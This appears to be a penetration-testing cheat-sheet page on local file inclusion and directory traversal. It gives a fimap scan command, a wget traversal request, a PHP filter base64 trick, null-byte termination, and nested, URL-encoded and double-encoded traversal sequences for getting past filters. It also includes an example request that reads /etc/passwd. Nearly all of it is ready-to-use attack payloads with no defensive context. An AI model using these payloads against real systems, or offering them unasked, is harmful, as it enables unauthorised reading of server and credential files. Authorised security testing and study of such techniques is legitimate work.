caon.io
Toggle Dark/Light/Auto mode Toggle Dark/Light/Auto mode Toggle Dark/Light/Auto mode Back to homepage

LFI

# https://github.com/kurobeats/fimap
fimap -u "https://example.com?test="

Wget

Sometimes browsers mess around with basic directory traversal sequences, but wget may work:

wget http://[host]/page.php?url=../../../../../../../file.html

Tricks

  • PHP Filter b64 (php://filter/zlib.deflate/convert.base64-encode/resource=FILE)
  • Nullbyte ending (%00)
  • 403bypass section may help

Bypasses

Nesting traversal sequences 

....//
....\/
..../\
....\\

URL Encoding 

dot             %2e
forward slash   %2f
backslash       %5c

Double URL Encoding 

dot             %252e
forward slash   %252f
backslash       %255c

Null Byte

Some applications check whether the user-supplied file name ends in a particular file type or set of file types, and reject attempts to access anything else. A null byte terminator (%00 or 0x00 in hex) will stop processing immediately, so that any bytes following it are ignored.

http://website/page=../../../etc/passwd%00
gdoc_arrow_left_alt IIS Open Redirect gdoc_arrow_right_alt